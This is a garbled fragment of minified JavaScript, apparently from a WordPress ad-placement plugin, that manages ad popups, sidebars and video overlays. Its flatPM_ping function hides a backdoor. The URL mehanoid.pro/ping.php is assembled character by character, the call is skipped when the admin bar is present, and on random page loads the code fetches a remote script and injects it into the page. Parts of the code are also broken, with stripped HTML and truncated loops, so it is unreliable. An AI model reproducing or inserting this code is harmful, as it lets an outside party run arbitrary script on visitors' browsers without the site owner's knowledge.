":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика